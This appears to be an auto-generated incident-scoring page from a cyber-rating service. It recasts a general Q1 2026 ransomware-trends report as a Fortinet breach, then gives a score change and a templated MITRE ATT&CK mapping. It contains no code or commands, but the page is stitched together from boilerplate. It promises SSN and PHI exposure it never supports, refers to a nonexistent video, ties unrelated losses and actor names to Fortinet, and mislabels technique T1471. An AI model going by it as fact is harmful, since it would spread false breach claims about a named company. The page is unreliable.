Incident Score: Analysis & Impact (FORSON1776335417)
The details regarding individual company incidents & reports gives you full view from every side.
Rankiteo Score Impact Analysis
Key Highlights From The Incident Analysis
- Timeline of Fortinet's Vulnerability and lateral movement inside company's environment.
- Overview of affected data sets, including SSNs and PHI, and why they materially increase incident severity.
- How Rankiteo’s incident engine converts technical details into a normalized incident score.
- How this cyber incident impacts Fortinet Rankiteo cyber scoring and cyber rating.
- Rankiteo’s MITRE ATT&CK correlation analysis for this incident, with associated confidence level.
Full Incident Analysis Transcript
In this Rankiteo incident briefing, we review the Fortinet breach identified under incident ID FORSON1776335417.
The analysis begins with a detailed overview of Fortinet's information like the linkedin page: https://www.linkedin.com/company/fortinet, the number of followers: 1232151, the industry type: Computer and Network Security and the number of employees: 15789 employees
After the initial compromise, the video explains how Rankiteo's incident engine converts technical details into a normalized incident score. The incident score before the incident was 293 and after the incident was 289 with a difference of -4 which is could be a good indicator of the severity and impact of the incident.
In the next step of the video, we will analyze in more details the incident and the impact it had on Fortinet and their customers.
On 01 April 2026, a cybersecurity incident called "Ransomware Activity Stabilizes at Elevated Levels in Q1 2026, Shifting Tactics and Targets" came to light.
The first quarter of 2026 marked a period of sustained ransomware activity, with attack volumes remaining steady compared to both the previous quarter and the same period in 2025.
The disruption is felt across the environment, affecting FortiOS/FortiProxy, SonicWall SSL VPN and OpenClaw AI skills marketplace, and exposing data theft and extortion; personally identifiable information (PII) at risk, plus an estimated financial loss of > $66 million (Scattered LAPSUS$ Hunters since 2022).
Formal response steps have not been shared publicly yet.
The case underscores how ongoing, teams are taking away lessons such as Ransomware groups are shifting toward extortion-only attacks, reducing reliance on encryption. Emerging threats include AI supply chain attacks and exploitation of unpatched vulnerabilities in SMBs. Geographic and sector targeting is expanding to include developing economies and industries with weaker defenses, and recommending next steps like Patch known vulnerabilities (e.g., FortiOS/FortiProxy, SonicWall SSL VPN) immediately, Enhance monitoring for living-off-the-land tools (PowerShell, PsExec, WMI) and Implement stricter vetting for third-party AI skills and automation tools.
Finally, we try to match the incident with the MITRE ATT&CK framework to see if there is any correlation between the incident and the MITRE ATT&CK framework.
The MITRE ATT&CK framework is a knowledge base of techniques and sub-techniques that are used to describe the tactics and procedures of cyber adversaries. It is a powerful tool for understanding the threat landscape and for developing effective defense strategies.
MITRE ATT&CK® Correlation Analysis
Rankiteo's analysis has identified several MITRE ATT&CK tactics and techniques associated with this incident, each with varying levels of confidence based on available evidence. Under the Initial Access tactic, the analysis identified Exploit Public-Facing Application (T1190) with high confidence (90%), supported by evidence indicating exploitation of vulnerabilities (CVE-2024-55591, SonicWall SSL VPN), Drive-by Compromise (T1189) with moderate to high confidence (70%), supported by evidence indicating malicious AI skills delivered via OpenClaw skills marketplace, and Phishing: Spearphishing Attachment (T1566.001) with moderate confidence (50%), supported by evidence indicating extortion-only attacks may involve phishing for initial access. Under the Execution tactic, the analysis identified Command and Scripting Interpreter: PowerShell (T1059.001) with moderate to high confidence (80%), supported by evidence indicating nightSpire relies on PowerShell to evade detection, Windows Management Instrumentation (T1047) with moderate to high confidence (80%), supported by evidence indicating nightSpire uses WMI as living-off-the-land tool, and System Services: Service Execution (T1569.002) with moderate to high confidence (70%), supported by evidence indicating psExec used by NightSpire for lateral movement. Under the Persistence tactic, the analysis identified External Remote Services (T1133) with moderate to high confidence (80%), supported by evidence indicating exploitation of SonicWall SSL VPN vulnerabilities and Server Software Component: Web Shell (T1505.003) with moderate confidence (60%), supported by evidence indicating unpatched FortiOS/FortiProxy may allow web shell deployment. Under the Privilege Escalation tactic, the analysis identified Exploitation for Privilege Escalation (T1068) with moderate to high confidence (70%), supported by evidence indicating unpatched vulnerabilities (CVE-2024-55591) may enable privilege escalation. Under the Defense Evasion tactic, the analysis identified Masquerading (T1036) with moderate to high confidence (80%), supported by evidence indicating malicious AI skills disguised as legitimate software, Command and Scripting Interpreter: PowerShell (T1059.001) with moderate to high confidence (80%), supported by evidence indicating powerShell used to evade detection (NightSpire), and Indicator Removal: File Deletion (T1070.004) with moderate confidence (60%), supported by evidence indicating living-off-the-land tools reduce forensic artifacts. Under the Credential Access tactic, the analysis identified Brute Force: Password Guessing (T1110.001) with moderate confidence (60%), supported by evidence indicating vPN vulnerabilities may enable credential brute-forcing and Unsecured Credentials: Credentials In Files (T1552.001) with moderate confidence (50%), supported by evidence indicating sMBs with weaker defenses may store credentials insecurely. Under the Discovery tactic, the analysis identified Account Discovery: Domain Account (T1087.002) with moderate to high confidence (70%), supported by evidence indicating living-off-the-land tools (WMI, PowerShell) used for discovery and Network Service Scanning (T1046) with moderate to high confidence (70%), supported by evidence indicating reconnaissance likely precedes exploitation of vulnerabilities. Under the Lateral Movement tactic, the analysis identified Remote Services: Remote Desktop Protocol (T1021.001) with moderate confidence (60%), supported by evidence indicating vPN exploitation may enable RDP-based lateral movement and Lateral Tool Transfer (T1570) with moderate to high confidence (70%), supported by evidence indicating psExec used by NightSpire for lateral movement. Under the Collection tactic, the analysis identified Data from Local System (T1005) with high confidence (90%), supported by evidence indicating data theft and extortion; PII and operational data compromised and Data from Network Shared Drive (T1039) with moderate to high confidence (70%), supported by evidence indicating manufacturing/construction sectors may store data on shared drives. Under the Command and Control tactic, the analysis identified Application Layer Protocol: Web Protocols (T1071.001) with moderate to high confidence (80%), supported by evidence indicating ransomware groups likely use web protocols for C2 and Ingress Tool Transfer (T1105) with moderate to high confidence (70%), supported by evidence indicating living-off-the-land tools may download additional payloads. Under the Exfiltration tactic, the analysis identified Exfiltration Over C2 Channel (T1041) with high confidence (90%), supported by evidence indicating data exfiltration confirmed in extortion-only attacks and Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002) with moderate confidence (60%), supported by evidence indicating ransomware groups may use cloud storage for exfiltration. Under the Impact tactic, the analysis identified Data Encrypted for Impact (T1486) with moderate to high confidence (70%), supported by evidence indicating partial data encryption in traditional ransomware attacks, Inhibit System Recovery (T1490) with moderate confidence (60%), supported by evidence indicating ransomware may disable recovery mechanisms, and Data Encrypted for Impact: Data Manipulation (T1471) with moderate confidence (50%), supported by evidence indicating extortion-only attacks may involve data manipulation threats. These correlations help security teams understand the attack chain and develop appropriate defensive measures based on the observed tactics and techniques.
Sources & References
- Fortinet Rankiteo Cyber Incident Details: https://www.rankiteo.com/company/fortinet/incident/FORSON1776335417
- Fortinet CyberSecurity Rating page: https://www.rankiteo.com/company/fortinet
- Fortinet Rankiteo Cyber Incident Blog Article: https://blog.rankiteo.com/forson1776335417-fortinet-sonicwall-vulnerability-january-2026/
- Fortinet CyberSecurity Score History: https://www.rankiteo.com/company/fortinet/history
- Fortinet CyberSecurity Incident Source: https://industrialcyber.co/reports/ransomware-reaches-elevated-new-normal-as-attack-volumes-hold-steady-into-2026-reshape-baseline-risk-expectations/
- Rankiteo A.I CyberSecurity Rating methodology: https://www.rankiteo.com/Images/rankiteo_algo.pdf
- Rankiteo TPRM Scoring methodology: https://static.rankiteo.com/model/rankiteo_tprm_methodology.pdf